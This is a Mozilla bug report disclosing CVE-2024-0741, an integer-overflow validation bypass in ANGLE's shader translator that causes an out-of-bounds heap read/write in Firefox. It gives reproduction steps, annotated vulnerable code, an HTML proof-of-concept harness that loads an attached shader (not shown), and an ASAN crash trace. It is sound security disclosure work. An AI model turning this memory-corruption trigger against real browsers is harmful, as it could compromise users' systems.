1864587 - (CVE-2024-0741) Validation bypass in ANGLE Translator leads to an OOB read/write.

Status: RESOLVED FIXED

(Core :: Graphics, defect)

Description

[Renan Rios [:hyreos]]

Steps to reproduce

1. Copy paste the HTML in a new HTML file and download fs.frag from attachments, place them in the same folder.
2. Run python3 -m http.server 8008.
3. Open firefox.
4. Access localhost:8008/POC.html.
5. Wait a few seconds.

Vulnerability

While auditing ANGLE I found a validation bypass via crafted GLSL shader in ANGLE Translator[5] which ends up in a wild OOB read/write in VariablePacker::fillColumns called from VariablePacker::checkExpandedVariablesWithinPackingLimits function.
VariablePacker::checkExpandedVariablesWithinPackingLimits is used to pack uniforms within vec4s and also to check if the shader has too many uniforms.

bool VariablePacker::checkExpandedVariablesWithinPackingLimits(
    unsigned int maxVectors,
    std::vector<sh::ShaderVariable> *variables)
{
    ASSERT(maxVectors > 0);
    maxRows_          = maxVectors;
    topNonFullRow_    = 0; // <-- [1] topNonFullRow_ is initially set to zero.
    
    // [...]

    rows_.clear();
    rows_.resize(maxVectors, 0); // <-- [2] rows_ will be resized to `maxVectors` which is usually 4096 in a vertex shader and 1024 in a fragment shader.
    // Packs the 4 column variables.
    size_t ii = 0;
    for (; ii < variables->size(); ++ii) // <-- The for here will first pack our mat4 and vec4 uniforms. It's interesting for us to have some value here inside "topNonFullRows_" since we need to perform a integer overflow when using it in a sum inside [5].
    {
        const sh::ShaderVariable &variable = (*variables)[ii];
        if (GetTypePackingComponentsPerRow(variable.type) != 4)
        {
            break;
        }
        topNonFullRow_ += GetVariablePackingRows(variable); 
    }
    if (topNonFullRow_ > maxRows_) // <-- [3] The final value of "topNonFullRow_" in the POC will be 1016 here, since in the test page I'm using a fragment shader.
    {
        return false;
    }
    // Packs the 3 column variables.
    int num3ColumnRows = 0;
    for (; ii < variables->size(); ++ii)
    {
        const sh::ShaderVariable &variable = (*variables)[ii];
        if (GetTypePackingComponentsPerRow(variable.type) != 3)
        {
            break;
        }
        num3ColumnRows += GetVariablePackingRows(variable); // <-- [4] Here we are going to sum the number of rows of every mat3 uniform inside the shader.
    }

    if (topNonFullRow_ + num3ColumnRows > maxRows_) // <-- [5] And check if the sum of rows is greater than maxRows_. However, this check is bypassable since there's no limit of how many uniforms ANGLE Translator will receive in this step since the function we are right now *is* the one that'll calculate if we have too many uniforms. In the attached POC "num3ColumnRows" will be 2147482631 here. The sum "1016 + 2147482631" will evaluate to -1 since both are signed integers.
    {
        return false;
    }
    
    fillColumns(topNonFullRow_, num3ColumnRows, 0, 3); // <-- [6] **Now we call "fillColumns" where our heap buffer overflow happens.**

    [...]

Now, let's take a look at the "fillColumns" function:

    void VariablePacker::fillColumns(int topRow, int numRows, int column, int numComponentsPerRow)
    {
        unsigned columnFlags = makeColumnFlags(column, numComponentsPerRow);
        for (int r = 0; r < numRows; ++r) <-- [7] Here a for will start from 0 to numRows(2147482631) performing a wild OOB write from `rows_` memory.
        {
            int row = topRow + r;
            ASSERT((rows_[row] & columnFlags) == 0);
            rows_[row] |= columnFlags; <-- OOB write in "rows_" happens here.
        }
    }

HTML:

<html>
  <head>
    <meta charset="utf-8" />
    <title>ANGLE POC</title>
  </head>
  <body>
    <canvas></canvas>
    <script>    
        const canvas = document.querySelector("canvas");

        canvas.width = 100;
        canvas.height = 100;

        const gl = canvas.getContext("webgl2");

        fetch('./fs.frag').then(async res => {
          const fragmentShaderSource = await res.text();

          const fragmentShader = gl.createShader(gl.FRAGMENT_SHADER);
          gl.shaderSource(fragmentShader, fragmentShaderSource);

          gl.compileShader(fragmentShader);

          const compiled = gl.getShaderParameter(fragmentShader, gl.COMPILE_STATUS);  
          console.log('Shader compile status: ' + compiled);
          let compilationLog = gl.getShaderInfoLog(fragmentShader);
          console.log('Shader compile log: ' + compilationLog);
        });
      </script>
  </body>
</html>
```

"fs.frag" is attached.

# ASAN StackTrace:

=================================================================
==16627==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5210019a8900 at pc 0x7fd87b5ff064 bp 0x7fd7e25af790 sp 0x7fd7e25af788
READ of size 4 at 0x5210019a8900 thread T18
    #0 0x7fd87b5ff063 in fillColumns /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:141:20
    #1 0x7fd87b5ff063 in checkExpandedVariablesWithinPackingLimits /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:266:5
    #2 0x7fd87b5ff063 in sh::CheckVariablesInPackingLimits(unsigned int, std::vector<sh::ShaderVariable, std::allocator<sh::ShaderVariable>> const&) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:404:19
    #3 0x7fd87b482496 in sh::TCompiler::checkAndSimplifyAST(sh::TIntermBlock*, sh::TParseContext const&, ShCompileOptions const&) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:1041:18
    #4 0x7fd87b47f17f in sh::TCompiler::compileTreeImpl(char const* const*, unsigned long, ShCompileOptions const&) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:497:10
    #5 0x7fd87b485ea8 in sh::TCompiler::compile(char const* const*, unsigned long, ShCompileOptions const&) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:1217:26
    #6 0x7fd87b3a78a7 in mozilla::webgl::ShaderValidator::ValidateAndTranslate(char const*) const /builds/worker/checkouts/gecko/dom/canvas/WebGLShaderValidator.cpp:253:7
    #7 0x7fd87b3a52b2 in mozilla::WebGLShader::CompileShader() /builds/worker/checkouts/gecko/dom/canvas/WebGLShader.cpp:101:34
    #8 0x7fd87b374d9d in CompileShader /builds/worker/checkouts/gecko/dom/canvas/WebGLContextGL.cpp:1454:10
    #9 0x7fd87b374d9d in mozilla::HostWebGLContext::CompileShader(unsigned long) const /builds/worker/checkouts/gecko/dom/canvas/HostWebGLContext.h:321:15
    #10 0x7fd87b374f8a in auto bool mozilla::MethodDispatcher<mozilla::WebGLMethodDispatcher, 38ul, void (mozilla::HostWebGLContext::*)(unsigned long) const, &mozilla::HostWebGLContext::CompileShader(unsigned long) const>::DispatchCommand<mozilla::HostWebGLContext>(mozilla::HostWebGLContext&, unsigned long, mozilla::webgl::RangeConsumerView&)::'lambda'(auto&...)::operator()<unsigned long>(auto&...) const /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:253:13
    #11 0x7fd87b340dd7 in __invoke_impl<bool, (lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned long &> /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:60:14
    #12 0x7fd87b340dd7 in __invoke<(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned long &> /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:95:14
    #13 0x7fd87b340dd7 in __apply_impl<(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple<unsigned long> &, 0UL> /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1678:14
    #14 0x7fd87b340dd7 in apply<(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple<unsigned long> &> /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1687:14
    #15 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:244:14
    #16 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #17 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #18 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #19 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #20 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #21 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #22 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #23 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #24 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #25 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #26 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #27 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #28 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #29 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #30 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #31 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #32 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #33 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #34 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #35 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #36 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #37 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #38 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #39 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #40 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #41 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #42 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #43 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #44 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #45 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #46 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #47 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #48 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #49 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #50 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #51 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #52 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #53 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #54 0x7fd87b340dd7 in mozilla::dom::WebGLParent::RecvDispatchCommands(mozilla::ipc::BigBuffer&&, unsigned long) /builds/worker/checkouts/gecko/dom/canvas/WebGLParent.cpp:62:21
    #55 0x7fd87b445c8a in mozilla::dom::PWebGLParent::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PWebGLParent.cpp:236:79
    #56 0x7fd8780078c1 in mozilla::gfx::PCanvasManagerParent::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp:279:32
    #57 0x7fd876aeeb1d in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1813:25
    #58 0x7fd876aeb5e3 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::UniquePtr<IPC::Message, mozilla::DefaultDelete<IPC::Message>>) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1732:9
    #59 0x7fd876aec71b in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1525:3
    #60 0x7fd876aed712 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1623:14
    #61 0x7fd8750a773f in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1192:16
    #62 0x7fd8750b503a in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:480:10
    #63 0x7fd876af7725 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20
    #64 0x7fd87694468a in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370:10
    #65 0x7fd87694468a in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363:3
    #66 0x7fd87694468a in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345:3
    #67 0x7fd87509e84e in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:370:10
    #68 0x7fd8930b510f in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #69 0x555cd968b0fa in asan_thread_start(void*) /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:225:31
    #70 0x7fd892e94b42 in start_thread nptl/pthread_create.c:442:8
    #71 0x7fd892f269ff  misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81

0x5210019a8900 is located 0 bytes after 4096-byte region [0x5210019a7900,0x5210019a8900)
allocated by thread T18 here:
    #0 0x555cd968ec5e in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:69:3
    #1 0x555cd96d41f5 in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fd87b602a4a in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7fd87b602a4a in allocate /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/ext/new_allocator.h:111:27
    #4 0x7fd87b602a4a in allocate /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:436:20
    #5 0x7fd87b602a4a in _M_allocate /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:296:20
    #6 0x7fd87b602a4a in std::vector<unsigned int, std::allocator<unsigned int>>::_M_fill_insert(__gnu_cxx::__normal_iterator<unsigned int*, std::vector<unsigned int, std::allocator<unsigned int>>>, unsigned long, unsigned int const&) /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/vector.tcc:530:34
    #7 0x7fd87b5fea09 in resize /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:847:4
    #8 0x7fd87b5fea09 in checkExpandedVariablesWithinPackingLimits /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:230:11
    #9 0x7fd87b5fea09 in sh::CheckVariablesInPackingLimits(unsigned int, std::vector<sh::ShaderVariable, std::allocator<sh::ShaderVariable>> const&) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:404:19
    #10 0x7fd87b482496 in sh::TCompiler::checkAndSimplifyAST(sh::TIntermBlock*, sh::TParseContext const&, ShCompileOptions const&) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:1041:18
    #11 0x7fd87b47f17f in sh::TCompiler::compileTreeImpl(char const* const*, unsigned long, ShCompileOptions const&) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:497:10
    #12 0x7fd87b485ea8 in sh::TCompiler::compile(char const* const*, unsigned long, ShCompileOptions const&) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:1217:26
    #13 0x7fd87b3a78a7 in mozilla::webgl::ShaderValidator::ValidateAndTranslate(char const*) const /builds/worker/checkouts/gecko/dom/canvas/WebGLShaderValidator.cpp:253:7
    #14 0x7fd87b3a52b2 in mozilla::WebGLShader::CompileShader() /builds/worker/checkouts/gecko/dom/canvas/WebGLShader.cpp:101:34
    #15 0x7fd87b374d9d in CompileShader /builds/worker/checkouts/gecko/dom/canvas/WebGLContextGL.cpp:1454:10
    #16 0x7fd87b374d9d in mozilla::HostWebGLContext::CompileShader(unsigned long) const /builds/worker/checkouts/gecko/dom/canvas/HostWebGLContext.h:321:15
    #17 0x7fd87b374f8a in auto bool mozilla::MethodDispatcher<mozilla::WebGLMethodDispatcher, 38ul, void (mozilla::HostWebGLContext::*)(unsigned long) const, &mozilla::HostWebGLContext::CompileShader(unsigned long) const>::DispatchCommand<mozilla::HostWebGLContext>(mozilla::HostWebGLContext&, unsigned long, mozilla::webgl::RangeConsumerView&)::'lambda'(auto&...)::operator()<unsigned long>(auto&...) const /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:253:13
    #18 0x7fd87b340dd7 in __invoke_impl<bool, (lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned long &> /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:60:14
    #19 0x7fd87b340dd7 in __invoke<(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned long &> /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:95:14
    #20 0x7fd87b340dd7 in __apply_impl<(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple<unsigned long> &, 0UL> /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1678:14
    #21 0x7fd87b340dd7 in apply<(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple<unsigned long> &> /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1687:14
    #22 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:244:14
    #23 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #24 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #25 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #26 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #27 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #28 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #29 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #30 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #31 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #32 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #33 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #34 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #35 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #36 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #37 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #38 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #39 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #40 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #41 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #42 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #43 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #44 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #45 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #46 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #47 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #48 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #49 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #50 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #51 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #52 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #53 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #54 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #55 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #56 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #57 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #58 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #59 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #60 0x7fd87b340dd7 in DispatchCommand<mozilla::HostWebGLContext> /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #61 0x7fd87b340dd7 in mozilla::dom::WebGLParent::RecvDispatchCommands(mozilla::ipc::BigBuffer&&, unsigned long) /builds/worker/checkouts/gecko/dom/canvas/WebGLParent.cpp:62:21
    #62 0x7fd87b445c8a in mozilla::dom::PWebGLParent::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PWebGLParent.cpp:236:79
    #63 0x7fd8780078c1 in mozilla::gfx::PCanvasManagerParent::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp:279:32
    #64 0x7fd876aeeb1d in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1813:25
    #65 0x7fd876aeb5e3 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::UniquePtr<IPC::Message, mozilla::DefaultDelete<IPC::Message>>) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1732:9
    #66 0x7fd876aec71b in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1525:3
    #67 0x7fd876aed712 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1623:14
    #68 0x7fd8750a773f in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1192:16
    #69 0x7fd8750b503a in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:480:10
